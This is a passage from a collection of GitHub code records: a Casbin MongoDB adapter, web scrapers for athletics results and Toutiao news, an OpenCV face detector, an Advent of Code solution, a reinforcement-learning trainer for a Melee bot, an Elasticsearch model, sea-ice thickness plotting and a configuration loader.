rule[3]\n if len(rule) > 4:\n line.v4 = rule[4]\n if len(rule) > 5:\n line.v5 = rule[5]\n line.save()\n\n def save_policy(self, model):\n '''\n implementing add Interface for casbin \\n\n save the policy in mongodb \\n\n '''\n for sec in [\"p\", \"g\"]:\n if sec not in model.model.keys():\n continue\n for ptype, ast in model.model[sec].items():\n for rule in ast.policy:\n self._save_policy_line(ptype, rule)\n return True\n\n def add_policy(self, sec, ptype, rule):\n \"\"\"add policy rules to mongodb\"\"\"\n self._save_policy_line(ptype, rule)\n\n def remove_policy(self, sec, ptype, rule):\n \"\"\"delete policy rules from mongodb\"\"\"\n if sec in [\"p\", \"g\"]:\n condition = {'ptype': sec}\n data = dict(zip(['v0', 'v1', 'v2', 'v3', 'v4', 'v5'], rule))\n for k in data:\n condition[k] = data[k]\n check = CurrentCasbinRule.objects(**condition)\n if check.count() > 0:\n CurrentCasbinRule.objects.filter(**condition).delete()\n return True\n else:\n return False\n else:\n return False\n\n def remove_filtered_policy(self, sec, ptype, field_index, *field_values):\n \"\"\"\n delete policy rules for matching filters from mongodb\n \"\"\"\n if sec not in [\"p\", \"g\"]:\n return False\n condition = {'ptype': sec}\n conditions = dict(zip(['v%s' % str(i) for i in range(0, len(field_values))], field_values))\n condition.update(conditions)\n check = CurrentCasbinRule.objects(**condition)\n if check.count() > 0:\n CurrentCasbinRule.objects(**condition).delete()\n return True\n else:\n return False\n","repo_name":"shblhy/flexlib","sub_path":"libs/casbin_mongoengine_adapter.py","file_name":"casbin_mongoengine_adapter.py","file_ext":"py","file_size_in_byte":4118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"1687850638","text":"#2 - Collect informations on each competition\n\n#Code source en html sur le site mais quand utilise beautiful soup on obtient du format json avec comme des dict python\n\n# => On récup id de l'event (nécessaire pour générer les liens des resultats dans l'étape suivante)\n# => Recup rankingCategory -> garde les plus importante -> OW / DF / GW / GL / A / B / C / D \n# => Recup disciplines (via les keys du dictionnaire comme pour rankingCategory et id) -> garde Stadium Outdoor / Stadium Indoor\n# => Recup les dates -> utile pour garde compétitions sur le dernier mois\n# => Faire un tri sur date / rankingCategory / disciplines\n\ndef reset_index_dataframe(name_dataframe):\n name_dataframe = name_dataframe.reset_index(drop=True)\n \n return name_dataframe\n\n\ndef get_info_on_competition(list_url):\n #Créer dataframe vide\n df_vide = pd.DataFrame()\n for i in list_url:\n def get_content(regex):\n #Get page in html\n req = urllib3.PoolManager()\n res = req.request('GET',i)\n soup = BeautifulSoup(res.data, 'html.parser')\n content = soup.find_all(regex)\n \n return content \n \n content = get_content('script') \n \n content = content[1]\n data = content.text\n data_dict = json.loads(data)\n \n #On se balade dans le dict\n dict_a = data_dict[\"props\"][\"pageProps\"][\"initialEvents\"]['results']\n \n #On transforme le dict en dataframe\n df1 = pd.DataFrame(dict_a)\n #On ajoute le dataframe de chaque page au dataframe vide\n df_vide = pd.concat([df_vide,df1])\n #Reset les index\n df_vide = reset_index_dataframe(df_vide)\n \n return df_vide\n \ndf_competition_info = get_info_on_competition(urls_calendar)\n\n\n#Filtre du dataframe pour garder les compétitions dont on a besoin\n\n#Recuperer la date d'aujdh\ndate_aujdh = datetime.date.today()\n#Prendre la date d'hier car si on garde sur la date d'aujdh on aura pas les résultats à jour\ndate_hier = date_aujdh-datetime.timedelta(days=1)\n#Faire soustraction entre date hier et 1 mois\ndate_4weeks_before = date_hier - datetime.timedelta(weeks=4)\n \n#Transforme colonne endDate en format date et startDate\ndf_competition_info['endDate'] = pd.to_datetime(df_competition_info['endDate']).dt.date\ndf_competition_info['startDate'] = pd.to_datetime(df_competition_info['startDate']).dt.date\n\n#Filtre sur colonne endDate pour garder dernier mois\nmask = (df_competition_info['endDate'] > date_4weeks_before) & (df_competition_info['endDate'] <= date_hier)\nfiltered_df = df_competition_info[mask]\n\n\n#Filtre sur colonne rankingCategory\nfiltered_df = filtered_df.loc[filtered_df['rankingCategory'].isin(['OW','DF','GW','GL','A','B','C','D'])] #Il y a exactement le str\n\n#Delete row with NA in column disciplines\nfiltered_df = filtered_df[filtered_df['disciplines'].notna()]\n\ndef filtre_dataframe_str_contains(dataframe,column_name,str_contains):\n dataframe = dataframe[dataframe[column_name].str.contains(str_contains)]\n \n return dataframe\n\n#Filtre sur disciplines\nfiltered_df = filtre_dataframe_str_contains(filtered_df,'disciplines','Stadium Indoor|Stadium Outdoor') #Il y a au moins un des deux\n\n#Reset les index\nfiltered_df = reset_index_dataframe(filtered_df)\n\n#Recup liste la colonne id\nid_list = list(filtered_df['id'])\n","repo_name":"Flojea/Athletics-Performances-Project","sub_path":"2 - Collect informations on each competition.py","file_name":"2 - Collect informations on each competition.py","file_ext":"py","file_size_in_byte":3380,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"28773213159","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport cv2\nimport sys\n\nface_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n\n\n# In[2]:\n\n\nimg=cv2.imread(sys.argv[1],cv2.IMREAD_COLOR)\n\n\n# In[3]:\n\n\nimg.shape\n\n\n# In[4]:\n\n\ncv2.imshow(\"img\",img)\ncv2.waitKey(1000)\ncv2.destroyAllWindows()\n\n\n# In[5]:\n\n\nfaces = face_cascade.detectMultiScale(img, 1.3, 5)\n\n\n# In[6]:\n\n\ndef getRes(aspect,original):\n if aspect None:\n self.position = 0\n self.depth = 0\n self.aim = 0\n def forward(self, amount):\n self.position += amount\n self.depth += self.aim * amount\n def down(self, amount):\n self.aim += amount\n def up(self, amount):\n self.aim -= amount\n def final(self):\n return self.position * self.depth\n\nmySub = Submarine()\nmovementData = get_data(\"data.txt\")\n\nfor move in movementData:\n direction = move.split(\" \")[0]\n amount = int(move.split(\" \")[1])\n if direction == \"forward\":\n mySub.forward(amount)\n elif direction == \"down\":\n mySub.down(amount)\n if direction == \"up\":\n mySub.up(amount)\n\nprint(f\"position: {mySub.position}\")\nprint(f\"depth: {mySub.depth}\")\nprint(f\"aim: {mySub.aim}\")\nprint(f\"total: {mySub.final()}\")","repo_name":"NicolasGerhardt/Advent-of-Code-2021","sub_path":"02/two.py","file_name":"two.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"37303109098","text":"import pickle\n\nnew_man = []\n\ntry:\n with open('man.txt', 'rb') as man_file:\n new_man = pickle.load(man_file)\nexcept IOError as err:\n print('IO error: ' + str(err))\nexcept pickle.PickleError as perr:\n print('PickleError : ' + str(perr)) ","repo_name":"nukebomb/pythontest","sub_path":"HeadFirstPython/chapter3/read_man.py","file_name":"read_man.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"14718705764","text":"import pickle\nimport random\n\nimport melee\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.distributions import Categorical\n\nfrom PolicyEmulator import PolicyEmulator\nfrom Trainer import Trainer\nfrom common import STATE_DIMENSION, NUM_ACTIONS, Action\n\nGAMMA = 0.99\nMODEL_PATH = 'policy_models/v1'\n\n# Randomly picks a number in [ENEMY_DIFFICULTY_LO, ENEMY_DIFFICULTY_HI] for the enemy's difficulty this episode\nENEMY_DIFFICULTY_LO = 8\nENEMY_DIFFICULTY_HI = 9\n\n# Per episode, emulator will choose a random stage from STAGES\nSTAGES = [melee.Stage.FINAL_DESTINATION]\n\nclass Policy(nn.Module, Trainer):\n def __init__(self):\n super(Policy, self).__init__()\n self.affine1 = nn.Linear(STATE_DIMENSION, 128)\n self.affine2 = nn.Linear(128, NUM_ACTIONS)\n self.eps = np.finfo(np.float32).eps.item()\n self.saved_log_probs = []\n self.rewards = []\n self.total_rewards = []\n self._verify_and_write_metadata()\n\n def _verify_and_write_metadata(self):\n # Verifies that metadata at this location, if it exists is the same as current metadata. Also writes metadata\n existing_metadata = None\n try:\n with open(MODEL_PATH + '_metadata') as file:\n existing_metadata = file.read()\n except FileNotFoundError:\n pass\n reward_f_serialized = pickle.dumps(PolicyEmulator.calc_reward)\n current_metadata = \\\n f'''\n GAMMA {GAMMA}\n ENEMY_DIFFICULTY_LO {ENEMY_DIFFICULTY_LO}\n ENEMY_DIFFICULTY_HI {ENEMY_DIFFICULTY_HI}\n STAGES {[x.name for x in STAGES]}\n ACTION_SPACE {[x.name for x in list(Action)]}\n REWARD_FUNCTION_SERIALIZED {reward_f_serialized}\n '''\n if existing_metadata:\n assert existing_metadata == current_metadata, \"There exists a model with the same name with different metadata. Rename this model\"\n with open(MODEL_PATH + '_metadata', 'w') as file:\n file.write(current_metadata)\n\n\n def forward(self, x):\n x = self.affine1(x)\n action_scores = self.affine2(x)\n return F.softmax(action_scores, dim=1)\n\n def get_action(self, state):\n state = torch.from_numpy(state.to_np_ndarray()).float().unsqueeze(0)\n probs = self(state)\n m = Categorical(probs)\n action = m.sample()\n self.saved_log_probs.append(m.log_prob(action))\n chosen_action = list(Action)[action.item()]\n return chosen_action\n\n def finish_episode(self):\n R = 0\n policy_loss = []\n returns = []\n for r in self.rewards[::-1]:\n R = r + GAMMA * R\n returns.insert(0, R)\n returns = torch.tensor(returns)\n returns = (returns - returns.mean()) / (returns.std() + self.eps)\n for log_prob, R in zip(self.saved_log_probs, returns):\n policy_loss.append(-log_prob * R)\n policy_loss = torch.cat(policy_loss).sum()\n policy_loss.backward()\n del self.rewards[:]\n del self.saved_log_probs[:]\n\n def reward_trainer(self, reward):\n self.rewards.append(reward)\n\n def save_to(self):\n state = {\n 'total_rewards': self.total_rewards,\n 'affine1': self.affine1.state_dict(),\n 'affine2': self.affine2.state_dict(),\n }\n torch.save(state, MODEL_PATH)\n\n def load_from(self):\n try:\n state = torch.load(MODEL_PATH)\n self.total_rewards = state['total_rewards']\n self.affine1.load_state_dict(state['affine1'])\n self.affine2.load_state_dict(state['affine2'])\n except FileNotFoundError:\n pass\n\n def start_train(self):\n self.load_from()\n running_reward = None\n while True:\n difficulty = random.randint(ENEMY_DIFFICULTY_LO, ENEMY_DIFFICULTY_HI)\n stage_choice = STAGES[random.randint(0, len(STAGES) - 1)]\n emulator = PolicyEmulator(self, difficulty, [stage_choice])\n total_reward, did_ai_win, episode_leng = emulator.game_loop()\n if not running_reward:\n running_reward = total_reward\n running_reward = 0.05 * total_reward + (1 - 0.05) * running_reward\n self.finish_episode()\n self.total_rewards.append(total_reward)\n print('Episode {}\\tLast reward: {:.2f}\\tAverage reward: {:.2f}'.format(\n len(self.total_rewards), total_reward, running_reward), flush=True)\n with open(MODEL_PATH + '_reward.csv', 'a') as f:\n if len(self.total_rewards) == 1:\n f.write('episode_num,total_reward,did_ai_win,episode_length,enemy_difficulty,stage')\n f.write(f'{len(self.total_rewards)},{total_reward},{1 if did_ai_win else 0},{episode_leng},{difficulty},{stage_choice}')\n self.save_to()\n\nif __name__ == '__main__':\n Policy().start_train()","repo_name":"AndrewAXue/theultimatemelee","sub_path":"Policy.py","file_name":"Policy.py","file_ext":"py","file_size_in_byte":4974,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"33711778775","text":"from elasticsearch import Elasticsearch\nfrom elasticsearch_dsl import Document, Text, Integer, Keyword, Float, Object, connections\nfrom crawl.models.source import Source\n\nconnections.create_connection(hosts=[\"elasticsearch\"])\nclient = Elasticsearch(hosts=[\"elasticsearch\"])\n\n\nclass Listing(Document):\n identifier = Integer()\n name = Text()\n url = Text()\n price = Float()\n category = Keyword()\n image = Text()\n properties = Object()\n source_id = Integer()\n source_name = Keyword()\n source_url = Keyword()\n\n class Index:\n name = \"listings\"\n settings = {\n \"number_of_shards\": 2\n }\n\n @classmethod\n def on_create(cls, target, connection):\n new_object = cls()\n\n new_object.identifier = target.id\n new_object.name = target.name\n new_object.url = target.url\n new_object.price = target.price\n new_object.category = target.category\n new_object.image = target.image\n new_object.properties = target.properties\n new_object.source_id = target.source_id\n\n source = connection.execute(Source.__table__.select().where(Source.id == target.source_id)).first()\n\n new_object.source_name = source.name\n new_object.source_url = source.url\n\n new_object.save()\n\n @classmethod\n def on_update(cls, target):\n old_object = cls.search().query(\"match\", identifier=target.id).execute()[0]\n\n old_object.name = target.name\n old_object.url = target.url\n old_object.price = target.price\n old_object.category = target.category\n old_object.image = target.image\n old_object.properties = target.properties\n old_object.source_id = target.source_id\n\n old_object.save()\n\nListing.init()","repo_name":"ABPozharliev19/strypes-labs-2023-final","sub_path":"crawl/es.py","file_name":"es.py","file_ext":"py","file_size_in_byte":1773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"23797765041","text":"\nimport matplotlib, sys\n#matplotlib.use('Agg')\nfrom mpl_toolkits.basemap import Basemap\nimport numpy as np\nfrom pylab import *\nimport numpy.ma as ma\nimport xarray as xr\nimport pandas as pd\nfrom scipy.interpolate import griddata\nfrom netCDF4 import Dataset\nimport netCDF4 as nc4\nimport time\nimport dask.array as da\nimport sys\nimport os\nfrom glob import glob\nsys.path.append('../')\nimport common_functions as cF\ncF.reset_matplotlib()\n\n#---------- Define file paths --------------------\n\n#mapProj = Basemap(epsg=3411,resolution='l', llcrnrlon=269.26, llcrnrlat=45., urcrnrlon=95.34, urcrnrlat=45.37)\n#mapProj = Basemap(projection='npstere',boundinglat=56,lon_0=0, resolution='l', round=False )\nmapProj = Basemap(epsg=3411,resolution='l', llcrnrlon=279.26, llcrnrlat=48., urcrnrlon=100, urcrnrlat=55.37)\n\nbaseDataPath='/cooler/scratch1/aapetty/DataOutput/IS1/'\nconcDataPath='/cooler/scratch1/aapetty/Data/ICECONC/CDR/monthly/'\n\nrunStr='run3'\n\nfigPath='/cooler/scratch1/aapetty/Figures/IS1/'+runStr\n\nregion_mask, xptsI, yptsI = cF.get_region_mask_sect('../../AncData/', mapProj, xypts_return=1)\n#region_maskG = griddata((xptsI.flatten(), yptsI.flatten()), region_mask.flatten(), (xptsN, yptsN), method='nearest', rescale=True)\n\nregions=[10, 11, 12, 13, 15]\n\n# DATE INFO\nice_thicknessIS1s=[]\ndateStrs=[]\niceconcs=[]\n\n#----IS1\ncampaignStrs=['FM03', 'FM04', 'FM05', 'FM06', 'FM08']\nrunStr='run3'\nversionStr='vInt4'\nsnowVar='NPdist'\nsmoothingWindow=0\nresolution=25.\n\n\nfor campaignStr in campaignStrs:\n\t\n\tsavePathIS1=baseDataPath+'/'+runStr+'/'+campaignStr+'/products/'\n\n\tlabelStr=campaignStr+snowVar+'W'+str(smoothingWindow)+'_'+str(resolution)+'km_'+versionStr\n\n\tprint(labelStr)\n\txptsIS1, yptsIS1,lonsIS1, latsIS1,ice_thicknessIS1 = cF.getIS1gridded(savePathIS1, labelStr, mapProj)\n\n\tice_thicknessIS1=ma.masked_where(np.isnan(ice_thicknessIS1), ice_thicknessIS1)\n\tice_thicknessIS1=ma.masked_where(latsIS1>85.5, ice_thicknessIS1)\n\tice_thicknessIS1=ma.masked_where(~np.isin(region_mask, regions), ice_thicknessIS1)\n\n\tice_thicknessIS1s.append(ice_thicknessIS1)\n\t#xptsc, yptsc, iceconcT=cF.get_cdr_conc(concDataPath, mapProj, yearStr, mStr)\n\t#iceconcs.append(iceconcT)\n\n\n# add the mean\nice_thicknessIS1s.insert(0, ma.mean(ice_thicknessIS1s, axis=0))\n#dateStrs.append('Winter mean')\ncampaignStrs.insert(0, 'mean')\n\nminval=0\nmaxval=5\n\nfig, axs = plt.subplots(nrows=2, ncols=3, figsize=(6, 5.8))\n\ni=0\nfor i in range(size(campaignStrs)):\n\tax=axs.flatten()[i]\n\t#if i == 5:\n\t#\tax.set_visible(False)\n\t#else:\n\tsca(ax)\n\t#im1 = mapProj.contourf(xptsIS1 , yptsIS1, ice_thicknessIS1s[i], levels=np.arange(minval, maxval+0.05, 0.5), cmap=cm.viridis , vmin=minval, vmax=maxval,extend='both', shading='gouraud', edgecolors='None', zorder=4, rasterized=True)\n\tim1 = mapProj.contourf(xptsIS1 , yptsIS1, ice_thicknessIS1s[i], levels=np.arange(minval, maxval+0.1, 0.25), cmap=cm.cubehelix_r, vmin=minval, vmax=maxval, extend='both', shading='gouraud', edgecolors='None', zorder=4, rasterized=True)\n\t# lower colorbar bounds\n\tplt.clim(-0.3,5)\n\tmapProj.drawparallels(np.arange(90,-90,-10), linewidth = 0.25, zorder=10)\n\tmapProj.drawmeridians(np.arange(-180.,180.,30.), linewidth = 0.25, zorder=10)\n\n\tmapProj.fillcontinents(color='0.9',lake_color='grey', zorder=5)\n\tmapProj.drawcoastlines(linewidth=0.25, zorder=5)\n\tax.annotate('('+chr(97+i)+') '+campaignStrs[i], xy=(0.98, 0.935),xycoords='axes fraction', horizontalalignment='right', verticalalignment='bottom', fontsize=8, zorder=10)\n\t#im11 = mapProj.contour(xptsc , yptsc, iceconcs[i],levels=0.15, colors='k', linewidths=0.8, zorder=5, alpha=1)\n\tmeanP=str(np.around(ma.mean(ice_thicknessIS1s[i]), decimals=2))\n\tax.annotate('Mean: '+meanP+' m', xy=(0.98, 0.02), xycoords='axes fraction', verticalalignment='bottom', horizontalalignment='right',color='k')\n\n\n#ADD COLORBAR TO MAP\n\ncax = fig.add_axes([0.3, 0.08, 0.4, 0.03])\n\ncbar = colorbar(im1,cax=cax, orientation='horizontal', extend='both', use_gridspec=True)\ncbar.set_label('Sea ice thickness (m)', labelpad=2)\n\ncbar.set_ticks(np.arange(minval, maxval+1, 1))\n\n\nsubplots_adjust(bottom=0.12, left=0.01, top = 0.99, right=0.99, wspace=0.02, hspace=0.03)\nsavefig(figPath+'/icethicknessIS1'+labelStr+'.png', dpi=300)\n","repo_name":"akpetty/ICESat-2-sea-ice-thickness","sub_path":"Code/plotting/plot_gridded_icesat.py","file_name":"plot_gridded_icesat.py","file_ext":"py","file_size_in_byte":4184,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"79"} +{"seq_id":"16471966901","text":"#-*- coding:utf-8 -*-\n\nimport requests,random,json,re,os,xlwt,xlrd,time\nfrom hashlib import md5\nfrom bs4 import BeautifulSoup\nfrom multiprocessing import Pool\nfrom configobj import ConfigObj\nfrom xlrd import open_workbook\nfrom xlutils.copy import copy\nfrom urllib.parse import urlencode\nfrom requests.exceptions import RequestException\nfrom emailSend import Email\nfrom excelInfo import infoExcel\nfrom ipProxy import ip_infoIni\n\n# 读取config.ini文件\ncf = ConfigObj(\"config.ini\",encoding='UTF8')\n# 日期格式化\ndate = str(time.strftime('%Y-%m-%d', time.localtime(time.time())))\n\nlist= [\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\",\n \"Mozilla/5.0 (X11; CrOS i686 2268.111.0) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11\",\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6\",\n \"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1090.0 Safari/536.6\",\n \"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/19.77.34.5 Safari/537.1\",\n \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5\",\n \"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.36 Safari/536.5\",\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3\",\n \"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3\",\n \"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3\",\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3\",\n \"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3\",\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3\",\n \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3\",\n \"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.0 Safari/536.3\",\n \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24\",\n \"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24\"\n ]\n\n# 随机选择header\ndef get_random_header():\n headers={\n 'Host': getHeadValue('host'),\n 'User-Agent':random.choice(list),\n 'Referer': getHeadValue('referer')\n }\n return headers\n\ndef get_page_index(offset, keyword):\n data = {\n 'offset': offset,\n 'format': 'json',\n 'keyword': keyword,\n 'autoload': 'true',\n 'count': 20,\n 'cur_tab': 1,\n 'from':'search_tab'\n }\n # 读取代理ip信息\n ipProxys=isProxy()\n\n if ipProxys:\n proxies = {\n ipProxys[0][0]: ipProxys[0][0]+'://'+ipProxys[0][1]+':'+ipProxys[0][2]\n }\n # 字典类型转url请求参数\n # 这是ajax请求的网址,不要忘了问号\n url = getConfValue('url') + urlencode(data)\n try:\n # 使用代理\n if (getProxyValue('isproxy')=='True'):\n print('使用代理ip: ',ipProxys)\n response = requests.get(url, headers=get_random_header(), proxies=proxies)\n # 不使用代理\n else :\n response = requests.get(url, headers=get_random_header())\n if response.status_code == 200:\n return response.json()\n return None\n except RequestException:\n print(\"请求索引出错\")\n return None\n\ndef parse_page_index(html):\n page_json=[]\n page_datas = []\n datas = json.loads(html)\n #如果data在键名中\n if datas['data']:\n #迭代data字典中的数据\n dataList = datas['data']\n for item in dataList:\n if 'open_url' in item.keys():\n title = item['title']\n article_url = item['article_url']\n comment_count = item['comment_count']\n datetime = item['datetime']\n has_video = item['has_video']\n if date in datetime :\n page_json.append([str(datetime),str(title),str(comment_count),str(has_video),str(article_url)])\n page_datas.append([page_json])\n return page_datas\n\n# 数据请求获取网页数据\ndef get_page_detail(url):\n try:\n response = requests.get(url)\n if response.status_code == 200:\n return response.text\n return None\n except RequestException:\n print(\"请求详情页出错\", url)\n return None\n\ndef save(page_data,filename):\n # print(page_data)\n for data in page_data:\n if data :\n infoExcel(data,filename)\n\ndef emailSend(filename):\n sender=getEmailValue('sender')\n mypass=getEmailValue('mypass')\n receiver=getEmailValue('receiver')\n keyword=getConfValue('keyword')\n res = Email(filename,sender,mypass,receiver,keyword)\n if res:\n print('邮件发送成功')\n else:\n print('邮件发送失败')\n\n#获取配置文件name对应值\ndef getConfValue(name):\n return cf['conf'][name]\ndef getHeadValue(name):\n return cf['head'][name]\ndef getProxyValue(name):\n return cf['proxy'][name]\ndef getEmailValue(name):\n return cf['email'][name]\n\ndef getDictDatas_FromFile(fs):\n lines = fs.readlines() # 按行读取\n data = [] # 定义一个空列表,用来接收每行数据\n for line in lines:\n list = line.strip(\"\\n\").split(\",\") # 用,号分隔,并去除换行符\n urls = {} # 定义一个空字典\n for item in list: # 获取list列表中的每一条数据\n temp = item.split(\":\",1) # 将list中每一条数据用 :号分隔1次\n urls[temp[0]] = temp[1] # 键-值对添加值 key = value\n data.append(urls)\n return data\n\ndef get_ips():\n result=[]\n flag = 'False'\n checkIpProxy = ['http', 'https']\n httpTxt = 'ip_http.txt'\n httpsTxt = 'ip_https.txt'\n try:\n # 随机获取http或者https\n checkIp = random.choice(checkIpProxy)\n # print(checkIp)\n if checkIp == 'http':\n try:\n fs = open(httpTxt, encoding='utf-8') # 打开文件\n ips = getDictDatas_FromFile(fs)\n result.append([checkIp,ips])\n return result\n except:\n try:\n fs = open(httpsTxt, encoding='utf-8') # 打开文件\n ips = getDictDatas_FromFile(fs)\n result.append([checkIp, ips])\n return result\n except:\n return None\n else:\n try:\n fs = open(httpsTxt, encoding='utf-8') # 打开文件\n ips = getDictDatas_FromFile(fs)\n result.append([checkIp,ips])\n return result\n except:\n try:\n fs = open(httpTxt, encoding='utf-8') # 打开文件\n ips = getDictDatas_FromFile(fs)\n result.append([checkIp, ips])\n return result\n except:\n return None\n return None\n except:\n return None\n\ndef isProxy():\n ipProxys=[]\n try:\n if (getProxyValue('isproxy')=='True'):\n # 获取代理ip信息\n result = get_ips()\n if result:\n httpType = result[0][0]\n ips = result[0][1]\n # print(httpType)\n try:\n ip = random.choice(ips)\n except:\n print('没有可用代理ip')\n return ipProxys\n for key in ip:\n # print(key)\n # print(ip[key])\n ipProxys.append([httpType,key,ip[key]])\n # print(\"代理ip: \",ipProxys)\n return ipProxys\n return ipProxys\n except:\n return ipProxys\n\n\ndef main(offset):\n time.sleep(3)\n #获得的是json形式返回的数据\n html = get_page_index(offset,getConfValue('keyword'))\n filename = getConfValue('titel') + date + '.xls'\n if html:\n data = json.dumps(html)\n page_datas = parse_page_index(data)\n for page_data in page_datas:\n if page_data:\n try:\n save(page_data,filename)\n except:\n continue\n\nif __name__ == '__main__':\n\n # 程序开始时间\n time_start = time.time()\n\n filename = getConfValue('titel') + date + '.xls'\n time.sleep(5)\n start = 1\n end = 20\n #构造一个list,设置offset参数,实现下滑加载请求\n groups = [x*20 for x in range(start, end+1)]\n pool = Pool()\n #需要执行的函数,可迭代对象\n pool.map(main, groups)\n # # 发送邮件\n emailSend(filename)\n\n # 程序结束时间\n time_end = time.time()\n print('耗时: '+str(time_end - time_start)+'秒')\n time.sleep(5)\n print('程序执行完成')","repo_name":"zzhong1991/getMessage_Python","sub_path":"getMessage_Python/venv/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"42321312076","text":"# coding=utf-8\n\"\"\"\n File name: quality_of_life.py\n Author: Łukasz Jędryczka\n Date created: 17/11/2018\n Python Version: 3.6\n\n Getting configuration from files defined in config directory.\n\"\"\"\nfrom config import common\n\n\nclass Configuration:\n def __init__(self):\n self.HOST = 'host'\n self.LANG = 'language'\n self.FORMAT = 'format'\n\n @staticmethod\n def __get_common(attribute):\n \"\"\"\n Getting attribute from common configuration file\n\n :param attribute: attribute name.\n :return: attribute value.\n \"\"\"\n return common.API_COMMON_CONFIG[attribute]\n\n def __get_host(self, dataset_code):\n \"\"\"\n Assemble url host. Format and language is defined in common configuration file\n\n :param dataset_code: name of database.\n :return: host main API url.\n \"\"\"\n host = self.__get_common(self.HOST) + '/' + self.__get_common(self.FORMAT) + '/' + \\\n self.__get_common(self.LANG) + '/' + dataset_code\n\n return host\n\n @staticmethod\n def __apply_filters(url, dataset_code):\n \"\"\"\n Getting filters from configuration files of dataset code\n\n :param url: url on which we want to apply filters.\n :param dataset_code: name of database.\n :return:\n \"\"\"\n if '?' not in url:\n url += '?'\n else:\n url += '&'\n for key in dataset_code.FILTERS:\n if isinstance(dataset_code.FILTERS[key], list):\n for value in dataset_code.FILTERS[key]:\n url += key + '=' + str(value) + '&'\n else:\n url += key + '=' + str(dataset_code.FILTERS[key]) + '&'\n url = url[0:-1]\n return url\n\n def get_url(self, dataset_code):\n \"\"\"\n Getting url to API based on common configuration file and data code filters\n\n :param dataset_code: name of database.\n :return: url with filetrs defined in configuration files.\n \"\"\"\n module = None\n for qol_param in common.QOL_PARAMS:\n if dataset_code in common.QOL_PARAMS[qol_param]:\n module = common.QOL_PARAMS[qol_param][dataset_code]\n break\n\n url = self.__get_host(dataset_code)\n url = self.__apply_filters(url, common)\n if module is not None:\n url = self.__apply_filters(url, module)\n\n return url\n\n @staticmethod\n def get_params_list():\n \"\"\"\n Getting parameters list from common configuration file\n\n :return: list with parameters list defined in common configuration file.\n \"\"\"\n return common.QOL_PARAMS\n\n @staticmethod\n def get_subparams_list(param_name = None):\n \"\"\"\n Getting sub parameters list from common configuration file\n\n :param param_name: parameter name.\n :return: list of sub parameters of this parameter, defined in common configuration file.\n \"\"\"\n if param_name is not None:\n return common.QOL_PARAMS[param_name]\n else:\n return None\n\n @staticmethod\n def get_value(key):\n \"\"\"\n Getting value of key in configuration file\n\n :param key: key of value we want to know\n :return: value of key in configuration file\n \"\"\"\n for qol_param in common.QOL_PARAMS:\n if key in common.QOL_PARAMS[qol_param]:\n return common.QOL_PARAMS[qol_param][key]\n\n @staticmethod\n def get_countries():\n \"\"\"\n Getting countries list\n :return: countries list\n \"\"\"\n return common.COUNTRIES\n\n @staticmethod\n def get_time_interval():\n \"\"\"\n Getting time interval\n :return: time interval\n \"\"\"\n return common.TIME_INTERVAL\n\n @staticmethod\n def get_number_of_features(key):\n \"\"\"\n Getting number of features\n :param key: param name\n :return: number of param features\n \"\"\"\n sum = 0\n for name, module in common.QOL_PARAMS[key].items():\n sum += module.LENGTH\n\n return sum\n","repo_name":"wookieJ/qli-countries","sub_path":"script/utils/config_loader.py","file_name":"config_loader.py","file_ext":"py","file_size_in_byte":4118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} 